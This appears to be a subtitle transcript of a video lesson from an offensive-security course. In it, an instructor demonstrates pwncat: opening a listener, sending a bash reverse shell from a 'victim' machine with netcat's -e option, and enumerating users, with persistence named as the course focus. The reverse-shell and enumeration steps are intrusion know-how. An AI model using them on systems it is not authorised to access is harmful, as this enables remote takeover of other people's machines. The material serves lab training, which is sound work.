WEBVTT

00:00:01.340 --> 00:00:02.950
Welcome back to our live environment.

00:00:02.950 --> 00:00:06.000
So now that we have pwncat installed and working properly,

00:00:06.050 --> 00:00:08.950
let's take a look at how to get a connection to our victim computer.

00:00:09.540 --> 00:00:10.930
If you read the pwncat manual,

00:00:10.940 --> 00:00:13.460
you see that there are several ways of starting a session,

00:00:13.840 --> 00:00:16.690
you can use SSH, you can connect to a bind shell,

00:00:16.700 --> 00:00:20.560
or the most common way, you can receive a reverse shell from the victim computer.

00:00:21.140 --> 00:00:22.460
So, let's see how that's done.

00:00:22.840 --> 00:00:25.560
On my attacker computer, I will open a listener with pwncat.

00:00:26.240 --> 00:00:30.660
I'll use pwncat -lp, which means listening port,

00:00:31.140 --> 00:00:33.060
and then the port that I want to listen on.

00:00:33.840 --> 00:00:36.560
In my case, I'll use the port 5656.

00:00:37.640 --> 00:00:41.360
Now once I press Enter, pwncat will be listening for a connection.

00:00:42.040 --> 00:00:44.640
All we have to do now is go to our victim computer and

00:00:44.640 --> 00:00:46.150
send that shell to our attacker machine.

00:00:46.540 --> 00:00:48.200
And there are several ways of doing that.

00:00:48.380 --> 00:00:48.930
For example,

00:00:48.930 --> 00:00:51.960
you could exploit a vulnerability on a website and create a reverse shell.

00:00:52.640 --> 00:00:54.580
But in here, just for the sake of this demo,

00:00:54.590 --> 00:00:57.870
I will simply go to the victim computer and then use netcat to

00:00:57.870 --> 00:00:59.960
forward the bash shell to my attacker machine.

00:01:00.440 --> 00:01:06.320
So it looks like this: nc, then -e to specify the executable that I want for it,

00:01:06.330 --> 00:01:07.490
which is my bash binary,

00:01:07.490 --> 00:01:11.460
and then the IP of my attacker machine and the port that I have open.

00:01:13.140 --> 00:01:13.760
And that's it.

00:01:13.770 --> 00:01:16.710
Once I press Enter, I will have a connection in pwncat.

00:01:17.540 --> 00:01:18.080
Take a look,

00:01:18.090 --> 00:01:21.160
it says here that it will receive the connection from our victim computer.

00:01:21.840 --> 00:01:22.560
Pretty cool, right?

00:01:23.240 --> 00:01:25.460
But note here on the terminal that it says local.

00:01:25.840 --> 00:01:28.900
And this means that this terminal is for the pwncat too.

00:01:28.900 --> 00:01:31.790
But, if you want to have a shell with my victim computer,

00:01:31.800 --> 00:01:33.760
I can simply press Ctrl+D,

00:01:34.240 --> 00:01:36.760
and then now we'll have a full shell with the victim computer.

00:01:37.640 --> 00:01:40.050
And this is pretty neat because I can go back and forth

00:01:40.050 --> 00:01:42.160
between my local shell and the victim computer.

00:01:42.940 --> 00:01:46.160
And again, in the remote shell, we can use any command that we want.

00:01:46.280 --> 00:01:48.760
It's like having a full TTY shell with the victim.

00:01:49.840 --> 00:01:51.570
Also, when I'm using the local shell,

00:01:51.580 --> 00:01:54.850
I can use the command sessions to check if my session is still open.

00:01:55.440 --> 00:01:58.160
As you can see here, we're still connected to the victim computer.

00:01:59.040 --> 00:02:01.200
The neat thing about pwncat is that it comes with

00:02:01.200 --> 00:02:02.660
several out-of-the-box features.

00:02:03.040 --> 00:02:05.280
In this course, we'll focus on the persistence ones,

00:02:05.280 --> 00:02:08.560
but just as an example, let me show you some of the enumeration features.

00:02:09.240 --> 00:02:12.020
Like if you want to enumerate all the users on this machine,

00:02:12.030 --> 00:02:16.150
we can simply use run, then the module that I want to use,

00:02:16.160 --> 00:02:20.590
which is enumerate, and then a dot, and the feature that I want to use,

00:02:20.890 --> 00:02:21.760
which is user.

00:02:22.840 --> 00:02:23.450
And that's it.

00:02:23.460 --> 00:02:24.470
When I press Enter,

00:02:24.480 --> 00:02:27.850
pwncat will retrieve from my victim computer all of the users in there.

00:02:28.540 --> 00:02:29.350
Really cool, right?

00:02:29.740 --> 00:02:31.830
And at any point when we are done,

00:02:31.840 --> 00:02:34.750
we can just exit pwncat and close the active sessions.
